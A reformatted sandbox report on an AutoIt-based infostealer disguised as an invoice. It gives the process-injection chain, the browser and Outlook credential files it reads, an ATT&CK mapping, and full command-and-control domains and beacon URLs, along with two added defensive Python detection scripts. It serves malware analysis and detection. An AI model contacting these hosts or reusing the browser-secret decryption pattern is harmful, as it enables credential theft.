Source: C:\Windows\SysWOW64\TapiUnattend.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\TapiUnattend.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: PROFOMA INVOICE SHEET.exe | Binary or memory string: WIN_81
Source: PROFOMA INVOICE SHEET.exe | Binary or memory string: WIN_XP
Source: PROFOMA INVOICE SHEET.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: PROFOMA INVOICE SHEET.exe | Binary or memory string: WIN_XPe
Source: PROFOMA INVOICE SHEET.exe | Binary or memory string: WIN_VISTA
Source: PROFOMA INVOICE SHEET.exe | Binary or memory string: WIN_7
Source: PROFOMA INVOICE SHEET.exe | Binary or memory string: WIN_8
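The file and registry accesses above are what the "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures rest on. Chromium-based browsers keep the key that protects the values in Login Data, Cookies and Web Data in the profile's Local State file, so a process that is not the browser reading both the key file and an encrypted store is the decryption pattern rather than an incidental read. The script below is an added example, not part of the report; it correlates per-process accesses in the report's "File opened" / "Key opened" line format, using the paths listed above as constructed input plus one constructed control line (chrome.exe reading its own store) to show that the rule ignores the legitimate owner.

```python
"""Added example (not part of the Joe Sandbox report): turn "File opened" and
"Key opened" lines into credential-theft findings by correlating, per process,
which browser artifacts were touched."""
import ntpath
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^Source: (?P<src>.+?)(?P<event>File opened|Key opened): "
    r"(?P<target>.*?)(?:Jump to behavior)?$"
)

# Chromium-based browsers: Local State holds the (DPAPI-wrapped) key that
# encrypts the secrets inside Login Data, Cookies and Web Data.
BROWSERS = {"google\\chrome\\user data": ("Chrome", "chrome.exe"),
            "microsoft\\edge\\user data": ("Edge", "msedge.exe")}
KEY_FILE = "local state"
STORES = {"login data": "saved passwords", "cookies": "session cookies",
          "web data": "autofill and payment data"}
MAIL_PROFILE_KEY = "windows messaging subsystem\\profiles"   # Outlook/MAPI profiles

TAPI = "C:\\Windows\\SysWOW64\\TapiUnattend.exe"
CHROME = "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\"
EDGE = "C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\"
# Constructed input: the report's lines, plus one control line for the browser itself.
REPORT_LINES = [
    f"Source: {TAPI}File opened: {CHROME}CookiesJump to behavior",
    f"Source: {TAPI}File opened: {CHROME}Network\\CookiesJump to behavior",
    f"Source: {TAPI}File opened: {EDGE}Network\\CookiesJump to behavior",
    f"Source: {TAPI}File opened: {CHROME}Login DataJump to behavior",
    f"Source: {TAPI}File opened: {EDGE}Login DataJump to behavior",
    f"Source: {TAPI}File opened: {CHROME}Network\\Local StateJump to behavior",
    f"Source: {TAPI}File opened: {CHROME}Local StateJump to behavior",
    f"Source: {TAPI}File opened: {CHROME}Web DataJump to behavior",
    f"Source: {TAPI}Key opened: HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\Jump to behavior",
    # Constructed control line (not in the report): the owner reading its own store.
    f"Source: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exeFile opened: {CHROME}Login DataJump to behavior",
]


def classify(target):
    """(browser, artifact) for a browser-profile path, else None."""
    low = target.lower()
    leaf = ntpath.basename(low.rstrip("\\"))
    for marker, (browser, _) in BROWSERS.items():
        if marker in low:
            if leaf == KEY_FILE:
                return browser, "key file"
            if leaf in STORES:
                return browser, STORES[leaf]
    return None


def findings(lines):
    """List of (process, target, verdict, stores) tuples, sorted by process."""
    touched = defaultdict(set)
    mail_readers = set()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        proc = ntpath.basename(m["src"]).lower()
        if m["event"] == "Key opened":
            if MAIL_PROFILE_KEY in m["target"].lower():
                mail_readers.add(proc)
            continue
        hit = classify(m["target"])
        if hit:
            touched[(proc, hit[0])].add(hit[1])
    owners = {browser: exe for browser, exe in BROWSERS.values()}
    out = []
    for (proc, browser), arts in sorted(touched.items()):
        if proc == owners[browser]:
            continue                      # a browser reading its own profile is normal
        stores = sorted(arts - {"key file"})
        verdict = "credential decryption pattern" if "key file" in arts and stores else "profile access"
        out.append((proc, browser, verdict, stores))
    for proc in sorted(mail_readers):
        if proc != "outlook.exe":
            out.append((proc, "Outlook", "mail profile registry read", []))
    return out


if __name__ == "__main__":
    for row in findings(REPORT_LINES):
        print(row)
```

For the report's lines this yields a "credential decryption pattern" verdict for TapiUnattend.exe against Chrome (key file plus three stores), a weaker "profile access" verdict against Edge (stores only, no Local State read recorded), and a mail-profile finding for the Outlook registry key; the chrome.exe control line produces nothing.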

            Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00381204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00381204
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00381806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00381806
MITRE ATT&CK Matrix (reconstructed from the flattened matrix: techniques are listed per tactic column in the report's order; the bracketed numbers are the count badges the report attaches to the techniques it matched, reproduced as rendered)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: [2] Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: [1] Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: [1] DLL Side-Loading; [2] Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: [1] Exploitation for Privilege Escalation; [1] Abuse Elevation Control Mechanism; [1] DLL Side-Loading; [2] Valid Accounts; [21] Access Token Manipulation; [412] Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: [1] Disable or Modify Tools; [1] Deobfuscate/Decode Files or Information; [1] Abuse Elevation Control Mechanism; [3] Obfuscated Files or Information; [1] DLL Side-Loading; [2] Valid Accounts; [12] Virtualization/Sandbox Evasion; [21] Access Token Manipulation; [412] Process Injection
Credential Access: [1] OS Credential Dumping; [21] Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: [2] System Time Discovery; [1] Account Discovery; [2] File and Directory Discovery; [116] System Information Discovery; [241] Security Software Discovery; [12] Virtualization/Sandbox Evasion; [3] Process Discovery; [11] Application Window Discovery; [1] System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: [1] Archive Collected Data; [1] Data from Local System; [1] Email Collection; [21] Input Capture; [3] Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: [4] Ingress Tool Transfer; [1] Encrypted Channel; [4] Non-Application Layer Protocol; [4] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: [1] System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (text rendering of the report's graph; node colours and icons are not recoverable)
Behavior Graph ID: 1511723; Sample: PROFOMA INVOICE SHEET.exe; Start date: 16/09/2024; Architecture: WINDOWS; Score: 100
Sample-level DNS/IP nodes: www.whats-in-the-box.org; www.weatherbook.live; 22 other IPs or domains
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 7 other signatures
Process tree:
PROFOMA INVOICE SHEET.exe (started)
    signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
    -> svchost.exe (started)
        signatures: Maps a DLL or memory area into another process
        -> bJWYsPIiPtg.exe (injected)
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            -> TapiUnattend.exe (started)
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                -> bJWYsPIiPtg.exe (injected)
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    network: zhs.zohosites.com 136.143.186.12, ports 55830, 55831, 55832 (ZOHO-ASUS United States); www.shanhaiguan.net 156.242.132.82, ports 55826, 55827, 55828 (POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles); 5 other IPs or domains
                -> firefox.exe (started)

Antivirus detection, initial sample
Source | Detection | Scanner | Label
PROFOMA INVOICE SHEET.exe | 50% | ReversingLabs | Win32.Trojan.Leonem
PROFOMA INVOICE SHEET.exe | 26% | Virustotal | -
PROFOMA INVOICE SHEET.exe | 100% | Avira | DR/AutoIt.Gen8
PROFOMA INVOICE SHEET.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
No Antivirus matches
Antivirus detection, domains
Source | Detection | Scanner
webredir.vip.gandi.net | 0% | Virustotal
crowsecurity.cloud | 0% | Virustotal
zhs.zohosites.com | 0% | Virustotal
weatherbook.live | 1% | Virustotal
newdaydawning.net | 0% | Virustotal
whats-in-the-box.org | 2% | Virustotal
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | 0% | Virustotal
15.164.165.52.in-addr.arpa | 0% | Virustotal
www.newdaydawning.net | 0% | Virustotal
www.whats-in-the-box.org | 1% | Virustotal
www.lanxuanz.tech | 1% | Virustotal
www.weatherbook.live | 0% | Virustotal
Antivirus detection, URLs
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://www.zoho.com/sites/images/professionally-crafted-themes.png | 0% | Avira URL Cloud | safe
http://www.newdaydawning.net/72tr/ | 0% | Avira URL Cloud | safe
http://www.crowsecurity.cloud/jvjp/?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eH | 0% | Avira URL Cloud | safe
http://www.crowsecurity.cloud/jvjp/ | 0% | Avira URL Cloud | safe
http://www.inspireplay.live/p8sm/ | 0% | Avira URL Cloud | safe
http://www.aaavvejibej.bond/lpl9/?h2Pt9=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&4RLhs=7BJLM4eH | 0% | Avira URL Cloud | safe
https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech | 0% | Avira URL Cloud | safe
http://www.lanxuanz.tech/ivo1/ | 0% | Avira URL Cloud | safe
http://www.wajf.net | 0% | Avira URL Cloud | safe
http://www.o731lh.vip/2mtz/ | 0% | Avira URL Cloud | safe
http://www.inspireplay.live/p8sm/?h2Pt9=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=&4RLhs=7BJLM4eH | 0% | Avira URL Cloud | safe
http://newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwj | 0% | Avira URL Cloud | safe
http://www.selftip.top/85su/ | 0% | Avira URL Cloud | safe
http://www.weatherbook.live/4hiy/ | 0% | Avira URL Cloud | safe
http://www.newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk= | 0% | Avira URL Cloud | safe
http://www.wajf.net/zl4r/ | 0% | Avira URL Cloud | safe
http://www.wajf.net/zl4r/?h2Pt9=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&4RLhs=7BJLM4eH | 0% | Avira URL Cloud | safe
http://www.o731lh.vip/2mtz/?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0= | 0% | Avira URL Cloud | safe
http://www.selftip.top/85su/?h2Pt9=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&4RLhs=7BJLM4eH | 0% | Avira URL Cloud | safe
http://www.whats-in-the-box.org/30jd/ | 0% | Avira URL Cloud | safe
http://www.weatherbook.live/4hiy/?h2Pt9=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&4RLhs=7BJLM4eH | 0% | Avira URL Cloud | safe
https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb | 0% | Avira URL Cloud | safe
http://www.shanhaiguan.net/p2q3/ | 0% | Avira URL Cloud | safe
http://www.lanxuanz.tech/ivo1/?h2Pt9=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=&4RLhs=7BJLM4eH | 0% | Avira URL Cloud | safe
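Every reputation scanner above rates the contacted URLs "safe", yet the list has a clear shape: plain http, a bare four-character path directory that differs per host, and a query made of one long variable parameter (h2Pt9) plus one parameter whose value never changes (4RLhs=7BJLM4eH). The script below is an added example, not part of the report; it takes a subset of the URLs listed above (nothing is added to them), separates the beacon URLs from the benign browser and search-engine strings recovered from memory, and extracts the constant parameter as a pivot string. It deliberately avoids urllib's parse_qsl, which would turn the '+' characters inside the base64-like values into spaces.

```python
"""Added example (not part of the Joe Sandbox report): separate the check-in
URLs from the benign browser/search-engine strings also found in memory, and
pull out the query parameter that stays constant across every host. The URL
list is a subset copied from the report's URL table."""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

URLS = [
    "http://www.crowsecurity.cloud/jvjp/?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eH",
    "http://www.aaavvejibej.bond/lpl9/?h2Pt9=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&4RLhs=7BJLM4eH",
    "http://newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwj",
    "http://www.selftip.top/85su/?h2Pt9=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&4RLhs=7BJLM4eH",
    "http://www.o731lh.vip/2mtz/?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0=",
    "http://www.lanxuanz.tech/ivo1/?h2Pt9=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=&4RLhs=7BJLM4eH",
    "http://www.newdaydawning.net/72tr/",
    "http://www.inspireplay.live/p8sm/",
    "http://www.wajf.net/zl4r/",
    "http://www.wajf.net",
    "http://www.whats-in-the-box.org/30jd/",
    "http://www.shanhaiguan.net/p2q3/",
    "http://www.weatherbook.live/4hiy/",
    "https://duckduckgo.com/ac/?q=",
    "https://www.ecosia.org/newtab/",
    "https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech",
    "https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb",
]

BEACON_PATH = re.compile(r"^/[a-z0-9]{4}/$")   # the path shape shared by every C2 URL in the report


def split_query(query):
    """Split k=v pairs WITHOUT percent/plus decoding: parse_qsl would turn the
    '+' inside the base64-like blobs into spaces, and the trailing '=' padding
    belongs to the value, so only the first '=' separates key from value."""
    return [tuple(pair.partition("=")[::2]) for pair in query.split("&")] if query else []


def beacon_candidates(urls):
    """URLs whose path is a bare four-character directory."""
    return [u for u in urls if BEACON_PATH.match(urlsplit(u).path)]


def hosts_by_path(urls):
    """host -> path token; in this report every host carries its own token."""
    return {urlsplit(u).netloc.lower(): urlsplit(u).path.strip("/")
            for u in beacon_candidates(urls)}


def query_fingerprint(urls):
    """(constant params, variable params) over the beacon URLs that carry a
    query. A key present in every request with a single value is a
    client/campaign identifier usable as a detection string; keys whose value
    changes per request carry the per-check-in payload."""
    queries = [urlsplit(u).query for u in beacon_candidates(urls) if urlsplit(u).query]
    values, presence = defaultdict(set), Counter()
    for q in queries:
        pairs = split_query(q)
        presence.update({k for k, _ in pairs})
        for k, v in pairs:
            values[k].add(v)
    constant = {k: next(iter(vs)) for k, vs in values.items()
                if presence[k] == len(queries) and len(vs) == 1}
    variable = sorted(k for k in values if k not in constant)
    return constant, variable


if __name__ == "__main__":
    const, var = query_fingerprint(URLS)
    print("C2 hosts:", sorted(hosts_by_path(URLS)))
    print("constant parameters:", const, "| per-request parameters:", var)
```

On this input the beacon set contains twelve hostnames (newdaydawning.net appears both with and without the www label), the constant parameter is 4RLhs=7BJLM4eH, and h2Pt9 is the only per-request field; the https search-engine and Zoho URLs fall outside the path rule and are ignored.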
Domains and IPs (the Antivirus Detection column is empty for every row and is shown as -)
Name | IP | Active | Malicious | Antivirus Detection | Reputation
webredir.vip.gandi.net | 217.70.184.50 | true | false | - | unknown
crowsecurity.cloud | 3.33.130.190 | true | false | - | unknown
inspireplay.live | 3.33.130.190 | true | false | - | unknown
zhs.zohosites.com | 136.143.186.12 | true | false | - | unknown
o731lh.vip | 3.33.130.190 | true | false | - | unknown
www.aaavvejibej.bond | 104.21.31.249 | true | false | - | unknown
weatherbook.live | 3.33.130.190 | true | false | - | unknown
newdaydawning.net | 44.213.25.70 | true | false | - | unknown
www.selftip.top | 199.192.21.169 | true | false | - | unknown
whats-in-the-box.org | 3.33.130.190 | true | false | - | unknown
www.shanhaiguan.net | 156.242.132.82 | true | false | - | unknown
cdl-lb-1356093980.us-east-1.elb.amazonaws.com | 54.81.206.248 | true | false | - | unknown
www.inspireplay.live | unknown | unknown | true | - | unknown
www.kfowks.site | unknown | unknown | true | - | unknown
15.164.165.52.in-addr.arpa | unknown | unknown | true | - | unknown
www.o731lh.vip | unknown | unknown | true | - | unknown
www.turbonotes.app | unknown | unknown | true | - | unknown
www.weatherbook.live | unknown | unknown | true | - | unknown
www.crowsecurity.cloud | unknown | unknown | true | - | unknown
www.newdaydawning.net | unknown | unknown | true | - | unknown
www.whats-in-the-box.org | unknown | unknown | true | - | unknown
www.lanxuanz.tech | unknown | unknown | true | - | unknown
www.wajf.net | unknown | unknown | true | - | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://www.crowsecurity.cloud/jvjp/ | false | Avira URL Cloud: safe | unknown
http://www.newdaydawning.net/72tr/ | false | Avira URL Cloud: safe | unknown
http://www.crowsecurity.cloud/jvjp/?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eH | false | Avira URL Cloud: safe | unknown
http://www.inspireplay.live/p8sm/ | false | Avira URL Cloud: safe | unknown
http://www.aaavvejibej.bond/lpl9/?h2Pt9=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&4RLhs=7BJLM4eH | false | Avira URL Cloud: safe | unknown
http://www.lanxuanz.tech/ivo1/ | false | Avira URL Cloud: safe | unknown
http://www.inspireplay.live/p8sm/?h2Pt9=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=&4RLhs=7BJLM4eH | false | Avira URL Cloud: safe | unknown
http://www.o731lh.vip/2mtz/ | false | Avira URL Cloud: safe | unknown
http://www.selftip.top/85su/ | false | Avira URL Cloud: safe | unknown
http://www.weatherbook.live/4hiy/ | false | Avira URL Cloud: safe | unknown
http://www.newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk= | false | Avira URL Cloud: safe | unknown
http://www.wajf.net/zl4r/ | false | Avira URL Cloud: safe | unknown
http://www.wajf.net/zl4r/?h2Pt9=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&4RLhs=7BJLM4eH | false | Avira URL Cloud: safe | unknown
http://www.o731lh.vip/2mtz/?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0= | false | Avira URL Cloud: safe | unknown
http://www.selftip.top/85su/?h2Pt9=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&4RLhs=7BJLM4eH | false | Avira URL Cloud: safe | unknown
http://www.whats-in-the-box.org/30jd/ | false | Avira URL Cloud: safe | unknown
http://www.weatherbook.live/4hiy/?h2Pt9=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&4RLhs=7BJLM4eH | false | Avira URL Cloud: safe | unknown
http://www.shanhaiguan.net/p2q3/ | false | Avira URL Cloud: safe | unknown
http://www.lanxuanz.tech/ivo1/?h2Pt9=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=&4RLhs=7BJLM4eH | false | Avira URL Cloud: safe | unknown
                                  Name | Source | Malicious | Antivirus Detection | Reputation
                                  https://duckduckgo.com/chrome_newtab | TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | false
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q= | TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmp | false
                                  • URL Reputation: safe
                                  unknown
                                  https://www.zoho.com/sites/images/professionally-crafted-themes.png | TapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmp | false
                                  • Avira URL Cloud: safe
                                  unknown
